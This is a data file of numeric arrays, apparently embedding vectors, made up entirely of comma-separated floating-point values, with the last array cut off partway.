0.006247708,0.023165163,0.08666569,0.08424067,-0.06678579,0.05404947,0.020543538,-0.013844852,0.065929,0.042668294,-0.083061114,0.055035,-0.0484577,-0.031082878,-0.031051276,0.08323009,0.011080784,-0.00889672,0.03312059,-0.0055074804,-0.008704907,0.07882101,-0.067467704,-0.015930537,-0.03781964,-0.00562254,0.016463052,0.084547736,-0.009231904,0.0015823186,0.11085169,0.022888066,0.022021312,-0.011052811,-0.020437079,-0.032160997,-0.054862976,0.08102272,0.022070907,-0.028415639,0.025620556,0.020842304,-0.07484912,-0.0035219293,-0.040039334,0.018800268,-0.011142434,-0.013718543,-0.049242266,-0.023832267,-0.023008773,-0.009688112,0.029674722,0.035515077,0.039818663,0.018338729,-0.068289354,-0.033421345,0.009532071,0.031957142,-0.00253313,-0.0012013578,-0.029687705,-0.025570685,0.027173826,-0.011163514,0.014915896,0.019321064,-0.034943573,-0.037241228,-0.03267348,0.06271528,0.01915231,0.009805866,0.0028324083,-0.0010788514,0.008577456,-0.032401178,-0.061627403,-0.006883044,0.007207179,-0.0003630967,0.0002824469,0.06599802,-0.0055083283,-0.02712144,0.018140554,-0.01498702,0.06130274,0.054787196,0.01589422,-0.06329645,0.035101965,-0.060137145,-0.004597941,0.007557281,-0.02871304,0.050336882,0.025737403,-0.002400933,-0.036026157,0.048352487,0.021327032,0.024280732,0.002039624,-0.012042913,0.041248526,-0.004275036,0.0554466,-0.0053222566,-0.09668643,0.10794441,0.0064058336,-0.03221224,-0.02059265,0.010199604,-0.024605758,0.016349373,-0.040191595,-0.004363581,0.010613594,-0.02779014,0.021204738,0.026077507,0.015958505,-0.0630413,0.005681322,-0.022895055,-0.03515317,-0.024847617,-0.003292987,0.010768558,-0.01020842,-0.0034939323,-0.007004798,-0.047742724,0.011638386,-0.01847474,-0.0049811644,0.040488385,-0.04877371,-0.011719871,-0.027623361,-0.06102549,-0.0065838452,-0.001076459,0.018101366,-0.005382302,-0.08059323,-0.02753534,0.001992112,-0.055594835,-0.047277622,0.039058115,0.0077212118,0.014294415,-0.048340667,-0.005169203,0.08316504,-0.007083534,0.016362648,0.008737629,0.017835466,-0.023173533,-0.011961627,-0.0065371622,-0.017875241,-0.032243352,0.0004690885,-0.021271147,0.030162299,0.0019208371,-0.009062696,0.0065574525,-0.028745111,-0.02433443,-0.034429047,-0.020162677,-0.015775403,-0.10385392,0.056054085,0.023243394,0.018062223,0.012176628,0.018043417,0.011908885,0.055972785,0.02060178,0.0018130186,0.04978085,-0.026165288,0.029120764,-0.041347615,-0.043252368,0.024784552,-0.049772806,-0.033359632,0.046994,-0.013964635,0.043565735,0.060684364,0.011671134,0.042476874,-0.005524622,-0.018491756,0.018407851,0.057330407,0.016410196,0.020717727,-0.028544402,-0.009752374,-0.048135515,-0.061475746,-0.032885835,-0.05793494,0.022187958,0.011530249,-0.008851927,0.03521173,0.0032152187,-0.008276602,0.04146094,0.008856487,0.0133704515,-0.02718785,-0.03197949,-0.009703576,0.03004265,-0.015167901,0.021977976,-0.019005163,0.008873881,0.038127318,0.004184931,0.0007954811,0.02367183,0.017758287,-0.012437559,-0.017767848,0.01182383,-0.027301192,0.034994975,0.012403617,0.048446003,0.029833073,0.008495933,0.0031226485,-0.043924186,0.034983158,0.03653083,0.048251785,0.03325848,0.014688562,-0.008440121,0.02063192,0.003932896,0.07082173,-0.07449065,-0.03812043,-0.003332859,-0.03299327,-0.0031766267,-0.03046754,0.03435919,0.0238088,0.025246544,0.0064941286,-0.01200731,-0.039113827,-0.06806778,-0.02241804,-0.02261737,-0.03378488,0.070137896,-0.008528388,0.019608,-0.045464676,-0.030098451,0.018480012,0.03601318,-0.01756015,-0.033974666,-0.017105198,-0.023337703,-0.004803767,0.0150613785,-0.01977544,0.013858289,0.03344015,0.044870187,0.04819236,-0.016853673,0.024340842,-0.023670072,-0.04239889,-0.036644615,0.012103702,0.040393345,0.0057760077,-0.015928162,-0.008365017,0.01672679,-0.023892354,0.007325258,0.056181513,0.029221926,0.0045249606,-0.028226856,0.08847443,0.0033915453,-0.006016603,0.027497578,-0.03155177,0.028589046,0.03400616,0.010363635,0.0050151814,-0.01178446,-0.05695148,-0.02168362,-0.024576614,-0.025568113,-0.0025281867,-0.0158163,-0.053477343,0.018535992,-0.01489846,0.040496156,0.02471974,-0.014076669,-0.01884014,-0.021978881,0.031220846,0.008615355,0.029404601,-0.022581998,0.0033962426,0.04360184,-0.027007306,-0.015904963,-0.04972713,0.01884319,0.04082133,-0.0067818547,0.020936053,0.003952004,0.0077072084,0.043689676,-0.07687921,-0.0523679,0.057655934,0.002539259,0.018749235,0.017996604,-0.018480614,-0.03739733,-0.00045871176,0.04012936,0.03082364,0.05073206,-0.021994831,-0.008661283,-0.001367562,0.039071217,0.029324776,0.014194113,-0.008631609,-0.051916312,0.03352122,0.030207949,-0.010863988,0.0017336848,0.031994235,0.039644927,0.016293166,0.058234654,0.04657262,-0.047995023,0.063192256,0.027861906,0.013788697,-0.018714447,0.008925531,-0.01937783,0.037653495,0.06134215,0.009837241,0.027820248,-0.019536447,-0.0017671938,-0.08608398,-0.04909935,0.043218907,0.049746595,0.07542029,-0.011353793,-0.06514106,0.012402131,-0.0023159552,0.011809093,0.07178745,0.00790561,0.1036061,-0.010974869,0.012543425,-0.023091337,-0.028013557,0.01070162,0.06261606,-0.0023884939,-0.05352987,0.04307501,0.009174834,-0.0042321314,0.0053000352,-0.046107933,0.025664637,0.03978285,-0.07424347,0.011060249,-0.0021046544,-0.005773859,-0.015746318,0.02520311,-0.0016803981,0.011055909,0.007589005,0.047716007,-0.0016114473,-0.06639346,0.009711631,0.0035832,-0.022272373,0.06501132,-0.000014920719,-0.0072522066,0.023719456,0.012884399,0.051353835,0.010056092,-0.0033552677,-0.044640396,-0.05794865,0.012473401,-0.009603289,0.044748627,0.049749274,0.045940984,-0.0036504571,0.042170633,0.00090818625,0.0040872623,-0.012594262,0.0025814355,0.094183184,-0.079335295,-0.047334157,0.0000490138,0.017821953,-0.03427058,0.0083799325,0.056704562,0.08442929,-0.055968076,0.039685197,0.025097935,-0.082801096,0.02962086,0.031594325,-0.010609014,-0.03824964,-0.0137248505,-0.07112688,-0.052967437,0.016487757,-0.09652412,-0.012115299,0.034907352,0.016099142,0.04387664,-0.024705008,0.0143281,0.03754222,0.004414064,-0.04771877,-0.024930716,0.0142613165,0.0072054593,-0.03567786,0.039799932,0.003192165,0.010035227,0.034194402,0.057333656,0.0033638608,0.049139917,0.01899551,-0.09292425,-0.0056984327,-0.026038703,0.0069727865,-0.034265686,0.026636,-0.02071347,-0.028293274,-0.013590696,-0.025218809,-0.07313281,-0.028248712,0.0057665114,0.045232896,0.0052277027,0.0025021825,-0.023319602,-0.026522351,0.023020001,-0.022342103,-0.0098486915,0.0017828072,-0.058219854,0.014867998,-0.022108926,-0.009218057,0.036686953,0.017433943,-0.006374372,-0.03717178,-0.038493987,0.017044231,-0.0397573,0.0074857078,0.044330765,0.00082966906,-0.014866292,-0.052778903,0.005414922,0.014176227,-0.009663824,-0.016265335,0.0045957435,0.0453077,0.009002153,-0.0101749115,0.0057138028,-0.03876771,-0.03699644,-0.07368994,-0.06380671,0.025214216,0.03853311,0.05126365,-0.04824111,0.023544958,0.07186125,-0.050842006,0.07579096,-0.001320826,-0.027874004,0.0068229786,0.03706237,0.000065931155,-0.031837016,0.03385321,-0.056263283,0.020081908,-0.020661153,-0.041455194,-0.037795026,0.014513734,-0.07751086,0.040141646,-0.056654666,0.01732139,0.012381145,-0.024118846,-0.025155103,0.018118514,0.02541417,-0.044258486,0.0020466845,-0.03429814,-0.015176727,-0.014973005,0.013639344,-0.02581843,-0.001901663,-0.018713692,0.039068613,-0.012239098,0.001267519,0.021201443,0.0059439647,0.03336784,-0.011859675,0.001393964,0.04734352,0.0069686617,-0.029577045,0.07334437,0.06357252,0.0098483395,-0.0207592,0.01606344,-0.007088244,0.0033610815,0.012436002,-0.040878363,-0.02363267,0.03004907,-0.006001601,0.007282472,-0.0013309725,0.044209946,-0.032485895,-0.02727246,-0.03882335,-0.072113946,0.015749447,0.012017019,-0.042799838,0.022100637,-0.046713352,0.0032222813,0.025994517,-0.013782027,0.019018756,0.026301054,-0.030926468,0.04091379,-0.012028441,0.006695891,-0.02337635,0.004273412,-0.054972272,0.03402409,-0.029514203,-0.041938532,-0.015916023,-0.01184592,-0.01145484,-0.0012209541,0.018324474,0.0134897,-0.01744003,0.033283334,-0.0048215757,0.028951837,0.02523915,0.011038067,0.001271774,0.009588072,0.054228976,0.0053376597,-0.020777235,0.021021737,-0.008519678,-0.04006854,-0.07088802,0.017352719,-0.009412436,-0.012509979,0.060057897,0.060662184,-0.018571261,-0.015413892,-0.07794953,-0.04786519,0.030642966,0.030819086,-0.014221457,-0.048332732,0.004688968,0.006856166,-0.0027134274,0.048390184,-0.024833322,-0.0049010543,0.0028580606,-0.03500762,0.0064684106,-0.04637024,0.079112045,-0.008482584,0.018291486,0.011978314,-0.01771021,-0.05800386,-0.04109432,-0.04501815,0.024324073,0.017375043,0.02442977,-0.009589654,-0.043679733,-0.013157312,0.051441666,0.0064370167,-0.036590695,0.0061265626,0.0013255707,-0.023173051,-0.0043958384,-0.0205512,0.01991528,-0.000030327756,0.038029242,0.106846005,0.0008697885,-0.015102838,-0.0421977,0.045079183,-0.03704892,-0.00792406,0.020051574,-0.016731137,-0.030644383],[-0.0020230254,0.051195152,-0.15591009,-0.06667651,0.074771315,-0.033511583,0.022944123,0.020358412,0.009485364,0.029349415,-0.04078063,-0.018029183,0.07731483,0.061064884,0.0106200455,-0.0370822,-0.0025205067,-0.050956875,0.038038798,0.037375566,-0.051062264,0.015005787,0.03375288,-0.040823106,0.024327496,0.054492716,-0.041864168,-0.03066427,-0.06083473,0.0064907195,0.06341442,-0.011457109,-0.019965209,-0.008351931,-0.107848205,0.0027880832,0.030418735,0.06188257,0.015260098,-0.024757951,0.09326848,0.013424541,-0.014069343,-0.0015069675,-0.012880565,-0.07156086,0.02064832,-0.027922068,0.030706884,-0.07513289,0.031799484,0.014369312,0.0008852583,-0.0048141982,0.077127196,0.06979758,0.024835302,0.01631747,0.0029964133,-0.08280907,0.037018493,0.046376377,-0.07049565,0.08601782,0.0025327785,-0.007909452,-0.0600592,0.06885242,-0.012914198,-0.060887706,0.03211564,-0.025037691,-0.005256926,-0.011691739,-0.020485763,-0.015904106,-0.029999811,-0.0372291,0.04637542,0.042685457,0.022481345,0.008331831,0.06546871,0.04000816,0.018929679,-0.0090644,-0.025270196,-0.04678231,-0.04115758,0.053048775,0.0021693627,0.006935799,-0.010682469,-0.0012920034,-0.06507674,0.021181924,-0.02266319,-0.0028577945,-0.03599813,-0.045931373,-0.053082075,-0.0032283876,0.011667325,0.005914272,0.019405099,0.021197924,0.03953815,-0.043021146,-0.011022883,-0.041359402,-0.045255717,0.059002936,-0.059145395,-0.022853268,-0.021961965,-0.010108376,0.028130457,-0.0201648,-0.0072358376,0.025677705,-0.03067805,-0.027511476,0.00029770134,0.036081705,-0.0027923603,0.06261235,-0.02064738,0.049163055,-0.00070414285,-0.017858997,-0.00897163,-0.018445224,-0.010293415,0.022341112,0.0052943914,0.06146543,-0.011184841,-0.034825314,0.014068347,-0.016029824,0.0286951,0.013370187,0.010462062,-0.016347868,-0.010235202,-0.042527493,-0.0018464507,-0.023981407,-0.06447342,0.050863698,0.027602434,0.027348243,-0.0016795449,0.03919537,-0.006104819,-0.01617406,0.045259852,-0.029220536,-0.013898703,-0.020097194,0.048849862,-0.0050568325,-0.056119476,0.04511338,-0.015678663,-0.054968294,0.0062971935,-0.017862188,-0.023187626,0.014617772,-0.039165385,-0.007861607,-0.021520294,-0.017533991,0.02881968,-0.01792186,0.08344181,-0.055364333,0.003636124,-0.026164727,0.05605938,-0.021303197,0.028957987,-0.0005612054,-0.015358669,0.008664381,-0.038727492,-0.0367566,-0.00042925047,-0.028837614,0.03776033,0.033981945,-0.05758984,-0.014893355,-0.045030408,-0.048718788,0.0420158,0.007593202,0.048093762,-0.016928509,-0.029455092,0.004594978,-0.033884585,0.034917988,-0.035201397,0.059586965,-0.01976126,-0.004847601,-0.062437467,0.07101969,0.07183792,0.02400579,-0.0040399735,-0.012704788,-0.013942045,-0.06826003,0.00840957,-0.003460945,-0.045530096,-0.004861955,-0.014056859,-0.027968213,0.02038592,0.004533012,0.0146534955,-0.0011989587,-0.04485361,0.0068275966,-0.024389822,0.01086167,-0.016382959,-0.10311028,0.059729077,-0.012025488,0.055801753,0.001905977,0.019424137,0.040330384,-0.01035241,0.034894012,0.014508709,0.04003,-0.0538908,0.0075406977,-0.0154721,-0.00597633,0.009714815,-0.032857105,-0.036172584,0.047072377,0.00780974,0.05250282,-0.00079035625,-0.01388535,0.044134617,-0.015044791,0.016931789,0.04102557,0.051650044,-0.002489881,0.039215688,-0.051945943,-0.016222145,-0.04846047,-0.10692287,-0.06709851,-0.036753554,-0.0036164029,0.026212076,-0.029462995,0.041667398,0.0037172795,0.031348813,-0.0108314855,-0.03929491,0.009216905,-0.013848876,-0.0393351,-0.0028369362,0.027188487,-0.0065371194,-0.018271783,-0.012638846,-0.018698506,0.018260727,0.033386238,0.04738097,0.051802907,0.019893408,0.037497103,0.0064490233,-0.0029920815,-0.03931864,0.021161247,-0.015364063,0.03931005,0.020954119,0.0050496524,0.01467142,-0.06844404,0.013109157,0.022867324,0.040031243,0.05411772,-0.044647306,-0.01338766,-0.005110378,-0.00033566306,0.028866343,-0.013718817,-0.017450577,-0.0119261565,-0.015076446,-0.010026955,0.0135353515,-0.014395779,0.007719561,0.040062264,0.05745277,0.027286032,-0.00011953178,-0.008888471,0.022414878,-0.028845133,-0.020767346,0.07289992,-0.017746003,0.019243574,-0.080720656,0.01177475,-0.0014517555,0.044074576,0.036740493,-0.04266538,-0.016183252,-0.01753835,0.048030566,-0.042033147,-0.010565773,0.02832765,0.038506977,0.025419379,0.020569427,-0.03481845,0.01567845,0.031043563,-0.03407921,-0.022932654,0.059552725,0.0029652307,-0.012186437,0.072317176,-0.01577766,-0.05147135,-0.005364498,0.034245495,0.068001114,0.033282932,0.004860529,-0.02308319,0.09095149,0.01248203,0.014741755,-0.019295394,-0.019977327,0.035470538,0.038559724,0.05673724,0.012686885,0.0121738855,-0.026335817,-0.06271641,-0.028136915,0.025908448,-0.053258147,-0.0034705647,-0.008328862,0.0010458396,0.021038473,0.019439846,0.022261048,-0.031256616,-0.022651466,0.016207907,0.0143194785,0.042475086,0.002923899,-0.048360337,0.026918475,0.011733204,0.013629392,0.015564118,-0.049366217,-0.010896964,0.013031357,-0.01770765,-0.003934474,0.039027203,-0.034891944,0.039096862,-0.03955768,-0.06508251,-0.014526583,0.017555377,-0.0041192938,-0.0060886,-0.010000983,-0.032590695,-0.008852193,0.01307701,0.023983592,0.06425488,-0.017408935,-0.059803944,-0.0043948996,0.0076134154,0.043381717,-0.0034482349,-0.04163699,-0.029915852,0.022786409,0.04329108,0.00043013864,0.020437865,0.044496834,0.045480527,0.021016303,0.046360616,-0.02415431,-0.008580651,0.032946326,0.011351461,0.023688694,-0.03046529,-0.012912166,0.0031842086,0.021467749,0.045043383,0.02825333,0.04362846,0.009508721,-0.030307518,0.018374488,-0.035744727,0.074354336,-0.0038287458,0.033409797,-0.013574045,-0.061994284,0.03363281,-0.012748944,0.051693074,0.06481922,0.0053919223,0.07992788,-0.034362957,-0.008768641,0.014783458,0.008894705,0.009699412,0.039587148,0.035388313,-0.06478367,0.029311718,0.018747065,-0.03296413,-0.029375274,-0.025034726,0.027225671,0.034883365,-0.053979598,0.05752208,-0.0013429367,-0.023614451,0.0031622741,-0.0033857296,-0.042980403,0.06260371,-0.004432301,0.07735217,0.024052426,-0.048279487,-0.05829374,-0.05091623,-0.02830391,0.05123006,-0.033725157,-0.025990414,-0.014899613,-0.006308259,0.00009460028,0.008755792,-0.026186084,-0.03003931,-0.049239974,-0.038586732,-0.0024811397,0.080446415,0.041781988,0.046325993,-0.036230613,0.055676308,0.0024878997,-0.02078012,0.0270401,0.0055775745,0.06441113,-0.05605704,-0.055688128,0.028004272,0.001452741,-0.02034438,-0.0044297236,0.009835498,0.0720997,-0.06754008,-0.010784598,0.022434702,-0.05097828,0.005241556,-0.009588784,-0.043316565,-0.029596003,-0.039185975,-0.03462248,0.02839086,0.015293009,-0.09022695,0.03681133,0.02635765,0.005372055,0.004964126,-0.063754,0.008730588,0.036592714,-0.025736205,-0.039255593,-0.00016009867,-0.004954539,0.0056112832,0.009811993,0.04691162,0.00085923285,0.034138978,0.03781697,-0.009965308,0.010122218,0.0012873284,0.03163095,-0.08794033,0.000098796954,-0.05209267,-0.013485508,-0.03987031,0.0020823143,-0.048926175,-0.014415355,-0.05645682,-0.029463697,-0.028215947,-0.05051322,0.02482609,0.058818508,-0.0032411094,0.0010363141,-0.04478167,-0.0072018066,0.023018843,0.004262653,0.08104824,0.046446927,-0.08694804,0.024445802,0.03375111,-0.040473364,0.015211945,0.00291299,0.029602645,-0.053859897,-0.040583376,0.009808629,-0.05379801,0.028468614,0.06271932,-0.020337276,0.011377098,-0.04947663,-0.0038383098,-0.014859346,0.019549932,0.0005340181,-0.028169194,0.031222425,-0.04478052,0.0054994863,0.0117021585,0.0326358,-0.005056212,-0.05075533,-0.025527718,-0.030150894,0.051218726,0.032445718,-0.06568726,0.029797228,0.08814569,-0.016900688,0.07022513,-0.0040903967,0.0038884466,0.0123565,0.026476657,0.025075646,-0.009200466,0.029634029,-0.011483439,0.061260752,0.014179761,-0.028507661,0.0141525855,-0.008169314,-0.053574465,0.05383121,-0.04281223,0.0372734,-0.020329194,-0.057177704,-0.039656363,-0.021830287,0.041321293,-0.0653553,-0.02297885,-0.04468112,0.013293528,-0.04750465,0.024380282,-0.04606243,0.009901998,0.019873634,0.070585445,0.008466417,-0.023049887,-0.004738656,0.05042211,0.04733593,-0.047549363,0.036729913,0.068034634,-0.0048480215,-0.0045348126,0.04196131,0.11052585,0.006537395,-0.019131966,-0.0086007845,-0.010964306,0.002319805,-0.0026800907,-0.0047647813,0.013585924,0.031673744,0.009220104,0.010479506,-0.014541183,0.0077323886,-0.0042135515,0.0048375353,0.00070540165,-0.027454928,0.0013066006,0.04327875,-0.005058199,0.014540002,-0.03794444,-0.0131014725,0.046085473,0.006291526,0.026595982,0.0364808,-0.06675086,0.03185871,-0.005727294,0.018314289,-0.04104193,0.0013333795,-0.039921597,0.006210999,0.016534004,-0.06639627,-0.031107653,-0.008113369,-0.032239128,0.025634632,-0.0033001634,-0.014229067,0.03267872,0.0057641566,0.008542611,0.009159266,0.021654626,-0.03927854,0.03614274,-0.03093458,0.007087776,-0.009119336,-0.004841653,-0.011561969,0.03546432,0.022554196,-0.056557205,-0.028777491,0.056875125,-0.037821975,0.04976175,0.02574693,0.0075405645,-0.030830445,-0.01824139,-0.042638015,0.037041187,0.005311669,-0.029748967,-0.065663256,-0.02202662,0.011593158,0.022235526,0.05037173,-0.064805195,-0.013692365,0.0033388117,-0.024519034,0.005946159,-0.052860778,0.030097462,-0.006747577,-0.018783165,0.019190475,0.0027535078,-0.057106778,-0.0555844,-0.029453462,0.019827886,-0.006661482,0.013335822,0.015063586,-0.05285194,-0.024164183,0.07616186,0.02865652,-0.051665246,-0.034503568,0.009844467,-0.0066470033,0.015938718,-0.0072373655,0.02594191,0.008604903,0.047231667,0.078448474,-0.0006140557,0.024772393,-0.027026191,0.034032494,-0.010201842,-0.020850038,0.01595785,-0.014504449,-0.035176907],[0.014018934,0.07659153,-0.14618191,-0.022509048,0.08446702,0.009387845,0.09109894,0.003129086,0.0064389724,-0.023660142,0.0000845986,-0.014401767,0.0684682,0.061146654,-0.032749403,-0.024358587,0.028456833,-0.07811297,0.0040005944,0.028005462,-0.055999223,-0.032732297,-0.068077624,-0.021906462,0.011829564,0.020184949,-0.066822074,-0.0053896024,-0.035761744,-0.013621914,0.0058997516,-0.031664327,0.0020787043,-0.034289457,-0.115415365,-0.027438717,0.08246404,0.011560614,-0.015624312,-0.017438482,0.019879363,0.052212298,0.035627577,0.00018961511,0.01353585,0.035079893,0.06335538,0.03847376,0.08782096,-0.07388472,0.0039341585,-0.00806911,0.06897559,0.020949982,0.02075283,0.0678631,-0.00058104866,0.010445058,0.046838447,0.019532105,0.05193712,-0.0022289467,-0.07507176,0.06937842,0.015444584,-0.036056075,-0.018719243,0.07955825,-0.0008152422,-0.04835789,0.03179355,-0.02422433,-0.008407704,0.008752012,-0.052893788,0.0037502893,-0.022513144,0.034970492,0.0033111975,0.051524643,-0.0056739403,-0.06456052,0.06246457,0.026750246,0.0145831155,0.017827304,-0.029219015,-0.03052029,-0.02435282,0.04807247,0.0022725286,-0.033797372,0.016870253,0.0513924,-0.043246046,0.0417395,0.0026910324,-0.01425762,-0.047130197,-0.034089647,-0.022499334,0.021025151,-0.04134784,-0.020506326,-0.032011658,0.04645538,0.003974247,0.0028712999,0.032265104,0.017238904,-0.074498184,0.04734134,-0.015579497,-0.023420325,-0.033692826,0.0056951884,0.042761043,0.0047173607,0.031946566,-0.023057029,-0.005045521,0.009074264,-0.026014132,0.0011747277,-0.02652135,0.02183364,-0.07531511,0.031255364,-0.00029970577,-0.07225757,-0.012799776,0.006069974,-0.0043815393,0.016990904,-0.0017016315,0.06243771,-0.024841255,-0.009724676,0.034176722,0.021915916,0.018497944,0.033363517,-0.019474342,-0.023223951,-0.042923044,-0.05946014,-0.011294701,-0.00093422533,-0.04480458,0.017467275,0.016776638,-0.014255262,0.017116033,0.04079014,0.010607949,-0.009566442,0.012774503,0.0146355545,0.007072965,0.020173224,0.05345497,0.011700635,-0.05879881,0.060390726,0.0054412577,0.003204426,0.030275045,0.013409447,-0.03791786,0.013323432,-0.05726342,-0.047754917,0.0004619472,-0.0053707226,0.025821766,0.009082106,0.07469495,-0.07508393,-0.014929372,0.005754868,0.051068276,-0.0057765893,0.037386674,-0.00042860192,0.01296897,-0.014291381,0.004592133,0.03554397,0.03432303,-0.0490767,0.04774871,-0.005629384,-0.07907073,-0.025228204,-0.013022157,-0.019472692,0.04279684,-0.0038071652,0.013803094,0.016410926,-0.046187654,-0.027738562,-0.008189885,-0.016143873,-0.0065028975,0.05903047,0.03248046,0.046586156,-0.021699667,0.010548496,0.09312102,-0.012495837,-0.0035176117,0.03693646,0.02817664,-0.013971672,0.035993814,0.020243334,0.018796269,0.0177048,0.026024729,-0.011993561,-0.020405618,0.009434824,0.019791069,0.043426313,-0.057146817,-0.033017185,-0.048510037,0.03598525,-0.0030235222,-0.12447182,0.07367202,0.002002378,0.016920296,0.028810935,0.019776132,0.020156557,-0.022483805,0.0142184105,0.011984729,0.029303882,-0.020934638,0.018629266,-0.060545165,-0.008046415,-0.010378091,-0.028088866,-0.023077637,0.06510943,-0.013692557,0.042688116,0.015800215,-0.023783341,0.022259552,-0.019710988,0.013967841,0.034803577,0.02106552,0.007310798,0.005019914,-0.012809384,0.013485173,-0.006085019,-0.0815416,-0.059894815,-0.057961836,0.0027064625,-0.014005518,0.0018894953,0.025776753,0.034019507,0.025138998,0.07087664,0.009785938,0.032512058,0.003225129,-0.038931217,0.02402812,0.04806241,-0.023358729,-0.020034287,-0.07538349,0.03729155,-0.017780334,0.019761216,0.024671108,-0.038396213,0.0028754396,0.024990369,-0.001598063,0.013039105,0.01807551,0.011255671,-0.014507931,-0.0028002793,0.034464017,-0.016245292,0.026709005,-0.051752847,0.001012712,0.06287245,0.063632555,0.0056222193,-0.041086312,-0.001967596,-0.013953695,0.01028292,0.019148182,-0.024482673,-0.03827358,0.0133074345,-0.04988958,0.025308376,-0.016757429,0.0029923108,0.03197804,0.053085122,0.043461025,-0.014916759,0.01771774,-0.01660246,-0.031779997,-0.06973304,-0.026889566,0.0405396,-0.014555829,0.007992539,-0.07065051,-0.025051484,0.062532715,0.041927777,0.03456007,-0.03924155,-0.03008444,-0.016784113,0.010151325,0.02219726,0.021024402,-0.008569077,0.03226314,-0.016016018,0.022345595,-0.022440238,0.0069684144,0.025835102,-0.021319214,-0.059991688,0.053251516,0.018820122,-0.0120128,0.018614028,-0.03618959,0.010013375,0.043512337,0.023967598,0.012430588,0.06127142,0.04189202,0.03216312,0.05382165,-0.015757684,-0.023723125,-0.017221324,0.011478767,0.05017186,0.020028204,0.021890365,-0.017298415,-0.008694566,-0.03825918,-0.0044521643,-0.013173171,0.036625892,0.0141354855,0.073588625,-0.06279139,-0.022599084,-0.002903223,0.0036121325,0.0040462986,-0.014378383,-0.044849154,-0.029458676,0.022855371,0.026961444,0.02059167,-0.08425551,-0.025089316,0.030318873,0.0022958715,0.015011331,-0.04955392,0.026912063,0.014360776,-0.06045365,0.02678498,0.005239621,-0.0245294,0.037899826,-0.039672572,-0.077372745,0.013990942,0.0048672804,0.024664551,0.009737206,-0.008848321,-0.024843873,0.037053246,0.0005029287,0.011846273,0.037964374,-0.043223355,-0.05812344,0.036306687,0.012653866,0.04532524,-0.0019420068,-0.02551652,-0.008164496,0.040113967,0.05623943,-0.02104382,0.022487808,-0.010538666,-0.015774721,0.011397354,0.009831698,0.011375157,-0.047810487,0.06265244,0.011471901,0.061642904,-0.027700648,-0.012851244,-0.014577326,-0.035535417,0.06299203,-0.01606925,0.03907219,-0.031713855,-0.037810363,-0.008355558,-0.046975285,0.03087234,0.036449935,0.05032178,-0.012251999,-0.05324515,0.047871456,-0.03354832,-0.005788336,0.029121116,0.02195587,0.067115895,-0.039392117,0.0036901804,0.031728085,0.039428893,0.048300814,-0.0066155735,0.03082862,-0.037173457,0.06262447,0.037784297,-0.036931768,0.011627984,-0.057576608,0.038226176,0.051998008,-0.089625075,0.037977204,0.03977226,-0.01586909,-0.056769203,-0.00080581167,0.0060470593,0.015709888,-0.0025824972,0.061120167,-0.009968882,-0.017999953,-0.011677131,0.0027579737,-0.016540758,0.026503844,0.008752246,-0.027866894,-0.028178733,-0.013334813,0.05207238,0.0127862105,0.006091614,-0.03881995,-0.027161065,-0.042021945,0.011755252,0.039467428,0.028713295,0.042957865,0.019007621,0.02645102,0.0033748162,-0.014754102,-0.018341972,-0.023750886,0.034779824,-0.07042634,-0.029506957,0.03416684,-0.0026581571,0.0077451537,0.012151912,0.003951577,0.04005741,-0.0380883,0.011671905,0.012088538,-0.03733455,0.03833553,0.03993366,-0.03008065,-0.046374716,-0.029860914,-0.050894413,-0.021698548,-0.030302793,-0.09249955,-0.005562033,-0.01786998,0.0324087,0.02909705,-0.0504225,0.009603391,-0.005974648,0.04900587,-0.023335554,-0.00957382,0.044637803,0.016486188,0.02020635,0.054396234,0.038081292,0.015415772,0.024487011,0.022637853,-0.03799205,0.024234131,-0.02346331,-0.09049145,0.029044006,-0.025444562,-0.00853002,-0.029538548,-0.0044151265,-0.014185842,0.009478683,-0.021782933,0.0038221995,-0.00699385,-0.067029245,-0.026580859,0.024664458,0.022310944,-0.021657191,-0.009271816,-0.023985496,-0.035383627,-0.03327782,0.004532667,0.014184189,-0.06407327,0.0041983454,0.0059491787,-0.0070918966,-0.021599365,0.016922893,0.00012911108,-0.042309854,-0.009426609,-0.0150839845,-0.04783742,-0.008230165,0.045971237,-0.016260881,0.034996722,-0.05714017,0.011047426,0.015396107,-0.054975625,-0.004854073,-0.016246589,0.04448979,-0.07104768,0.022880925,-0.0049308785,0.028029405,0.005785704,-0.09617657,-0.042693757,0.024970926,0.026411343,0.10278439,-0.051536087,0.03905761,0.06459926,-0.028562257,0.02397705,0.0153341545,-0.02931926,0.022994706,0.00464499,0.047027048,0.009716186,0.038115676,-0.03850432,0.04066748,0.03270384,0.011424067,-0.018307025,0.022548117,-0.025479676,0.018037781,-0.056316655,0.028229257,-0.003151754,0.012586436,-0.103027,0.0226367,0.012388988,-0.03388347,-0.0026720956,-0.014224626,-0.010292448,-0.084283486,0.038680058,-0.040626187,0.045628086,-0.056343563,0.0643515,0.0019869336,-0.040252626,-0.009313135,0.06066698,0.05796392,-0.012879731,0.045455024,0.06124555,0.007329479,-0.028970947,0.05519705,0.07704953,-0.03333283,-0.025071569,0.010205541,0.028451225,0.036967363,-0.017800368,0.0010859307,-0.018797714,-0.010855194,-0.046243258,-0.033328645,-0.036361545,-0.009897284,0.0017120793,0.0075020725,-0.018449372,-0.06238949,-0.021531768,0.026084473,0.009554211,-0.039620236,-0.019849474,0.030838968,-0.001815623,0.011799198,0.015717097,0.022350468,-0.0069661844,0.008849393,0.008012839,0.044022627,-0.059080865,-0.023637358,0.0030333446,0.011331522,-0.022094635,-0.07018623,-0.037147284,-0.008719126,-0.012188901,0.007397569,0.010126313,0.019443117,0.021239378,-0.023992017,-0.05172842,-0.008374404,0.025558334,-0.025144605,0.0544557,0.010980004,0.019194562,0.0058466387,-0.02031408,0.012141,0.033390805,-0.02169729,-0.028953232,0.03258453,0.016938822,-0.039349817,0.07036611,0.0062870914,-0.01356688,-0.03385928,-0.059073664,-0.023305485,-0.003664852,0.013107862,-0.03841255,-0.061652884,0.030070119,0.0056971656,-0.024325969,0.043008965,-0.017752105,-0.0060764533,-0.013173851,-0.016174313,-0.05378597,-0.064959645,0.051540837,0.044332676,0.01007945,-0.021054102,0.00797484,-0.0450617,-0.037059072,-0.047634553,0.012634252,0.042506836,0.006945463,-0.03073552,-0.040601917,-0.077664755,0.045202915,0.02475433,-0.04282612,-0.026071439,-0.06277609,-0.07345685,0.012258768,0.03950436,0.010173825,0.029427502,0.019162958,0.094021335,-0.033820774,0.038600747,-0.04123115,-0.025613695,-0.003325661,-0.03044346,-0.015172179,0.004047847,-0.010964915],[0.0023823797,0.038228724,-0.16580282,-0.049596127,0.069180354,0.009864385,0.049429215,0.002857007,-0.025809055,-0.038794152,-0.014348266,0.02772281,0.11405496,0.026726505,-0.0010576518,-0.0070936056,0.030159932,-0.052267384,-0.0